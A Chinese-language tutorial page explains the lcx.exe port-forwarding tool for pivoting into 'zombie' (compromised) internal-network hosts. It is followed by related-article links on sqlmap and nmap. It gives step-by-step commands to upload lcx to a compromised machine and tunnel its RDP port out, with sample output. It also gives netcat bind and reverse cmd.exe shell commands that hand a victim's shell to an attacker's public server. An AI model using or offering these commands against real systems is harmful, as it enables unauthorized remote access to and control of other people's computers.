lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì))

這里小編要講解到另外一款比較強(qiáng)大的LCX端口轉(zhuǎn)發(fā)的工具.
下面就先詳細(xì)講解下LXC轉(zhuǎn)發(fā)工具與使用方法:
lcx.exe是個(gè)端口轉(zhuǎn)發(fā)工具,相當(dāng)于把肉雞A上的3389端口轉(zhuǎn)發(fā)到B機(jī)上,
當(dāng)然這個(gè)B機(jī)必須有外網(wǎng)IP.這樣鏈接B機(jī)的3389度端口就相當(dāng)于鏈接A機(jī)的3389.
用法:
如在本機(jī)B上監(jiān)聽(tīng) -listen 51 3389,在肉雞A上運(yùn)行-slave
本機(jī)ip 51 肉雞ip 3389 那么在本地連127.0.0.1就可以連肉雞的3389.第二條是本機(jī)轉(zhuǎn)向。
例:現(xiàn)在有一個(gè)ip為222.221.221.22的websehll.用端口掃描發(fā)現(xiàn)開(kāi)放了3389端口
可是我們輸入外網(wǎng)IP可是不能正常鏈接。那么很有可能就是內(nèi)網(wǎng)服務(wù)器。我們dos執(zhí)行ipconfig可以看到。
這樣的就是內(nèi)網(wǎng)服務(wù)器了。
上傳lcx.exe到肉雞 然后 cx.exe -listen 51 3389 意思是監(jiān)聽(tīng)51端口并轉(zhuǎn)發(fā)到3389端口。
顯示如下[+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port:51 ……
然后在肉雞上運(yùn)行 lcx.exe -slave 你的IP 51 222.221.221.22 3389
222.221.221.22是我舉例用的肉雞IP.換成你的..運(yùn)行以后本機(jī)監(jiān)聽(tīng)端口。
顯示如下信息
[+] Listening port 51 ……
[+] Listen OK!
[+] Listening port 3389 ……
[+] Listen OK!
[+] Waiting for Client on port:51 ……
[+] Accept a Client on port 55 from 222.221.221.22 ……
[+] Waiting another Client on port:3389….
好了.現(xiàn)在在自己機(jī)子上鏈接 127.0.0.1 或者輸你自己IP.
發(fā)現(xiàn)進(jìn)去的不是自己機(jī)子,(或者自己機(jī)子根本連不上),而是肉雞A了!優(yōu)點(diǎn),搞定內(nèi)網(wǎng)肉雞.
缺點(diǎn),有點(diǎn)麻煩,而且每次都要通過(guò)sqltools先進(jìn)行端口轉(zhuǎn)發(fā).當(dāng)然也可以用反彈木馬控制肉雞
下面是其他網(wǎng)友的補(bǔ)充:
本機(jī): lcx -listen 2222 3333
2222為轉(zhuǎn)發(fā)端口,3333為本機(jī)任意未被占用的端口
肉雞:lcx -slave 119.75.217.56 2222 127.0.0.1 3389
119.75.217.56 為本機(jī)IP,2222為轉(zhuǎn)發(fā)端口,127.0.0.1為肉雞內(nèi)網(wǎng)IP,3389為遠(yuǎn)程終端端口
3389連接時(shí)格式 127.0.0.1:3333
內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì)
一、lcx 的使用
1. 肉雞上執(zhí)行:lcx.exe –slave 公網(wǎng) ip + 端口 肉雞 ip + 端口
例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389
意思是把肉雞的 3389 端口轉(zhuǎn)發(fā)到 xxx.xxx.xxx.xxx 公網(wǎng)的 10000 端口
2. 公網(wǎng) ip 機(jī)器上執(zhí)行 Lcx.exe –listen 10000 10001
例如:Lcx.exe –listen 10001 10000
意思是監(jiān)聽(tīng)公網(wǎng) ip 機(jī)器上的 10001 端口請(qǐng)求,并將 10001 的請(qǐng)求傳送給 10000 端口。
此時(shí),RDP 連接,只需要輸入 127.0.0.1:10000,即可遠(yuǎn)程連接到肉雞上。
二、nc 反彈 cmdshell
1. 開(kāi)啟肉雞代理執(zhí)行 cmdshell
在肉雞上執(zhí)行 nc -l -p 2333 -t -e cmd.exe
意思是,肉雞監(jiān)聽(tīng)本地的 2333 端口,且應(yīng)答通過(guò) telnet(-t)模式執(zhí)行 cmd.exe 程序
在自己的公網(wǎng)服務(wù)器上執(zhí)行 nc -nvv 肉雞 ip 2333
2. 反向代理執(zhí)行 cmdshell
在公網(wǎng)服務(wù)器上運(yùn)行 nc -l -p 2333
意思是監(jiān)聽(tīng)本地端口 2333,登臺(tái)其他電腦登陸過(guò)來(lái)
在肉雞上執(zhí)行 nc -t -e cmd.exe 公網(wǎng)服務(wù)器 ip 2333
意思是讓肉雞可以通過(guò) telnet 模式執(zhí)行 cmd.exe 程序,并可以把執(zhí)行權(quán)通過(guò) 2333 端口給公網(wǎng)服務(wù)器
相關(guān)文章
SQLMap簡(jiǎn)介及簡(jiǎn)單應(yīng)用實(shí)例圖文詳解
一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過(guò)插件,支持的數(shù)據(jù)庫(kù)是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04- Nmap是一款網(wǎng)絡(luò)掃描和主機(jī)檢測(cè)的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時(shí)可以用來(lái)作為一個(gè)漏洞探測(cè)器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見(jiàn)SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個(gè)注入工具,其實(shí)在注入工具方面,很多人都是通過(guò)這個(gè)工具實(shí)施的檢測(cè)與注入,對(duì)于我們從事安全防御的人來(lái)說(shuō),一定要引起注意,一般的程序員寫(xiě)的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結(jié),需要的朋友可以參考下2017-09-06
lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì))
這篇文章主要介紹了lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì)),需要的朋友可以參考下2017-09-06Nmap備忘單 從探索到漏洞利用 第四章 繞過(guò)防火墻
這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關(guān)于掃描防火墻,IDS / IPS 逃逸,Web服務(wù)器滲透測(cè)試等。在此之前,我們應(yīng)該了解一下防火墻的一些基礎(chǔ)知識(shí)以便2016-12-27- 眾所周知NMAP是經(jīng)常用來(lái)進(jìn)行端口發(fā)現(xiàn)、端口識(shí)別。除此之外我們還可以通過(guò)NMAP的NSE腳本做很多事情,比如郵件指紋識(shí)別,檢索WHOIS記錄,使用UDP服務(wù)等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級(jí)NMAP掃描的技術(shù),我們將進(jìn)行一個(gè)中間人攻擊(MITM)?,F(xiàn)在,游戲開(kāi)始了2016-12-27
- nmap是一個(gè)網(wǎng)絡(luò)連接端掃描軟件,用來(lái)掃描網(wǎng)上電腦開(kāi)放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個(gè)操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡(luò)漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡(jiǎn)稱AWVS)是一款知名的網(wǎng)絡(luò)漏洞掃描工具,它通過(guò)網(wǎng)絡(luò)爬蟲(chóng)測(cè)試你的網(wǎng)站安全,檢測(cè)流行安全漏洞。倫敦時(shí)間2015年6月24日,官方發(fā)布了2016-09-28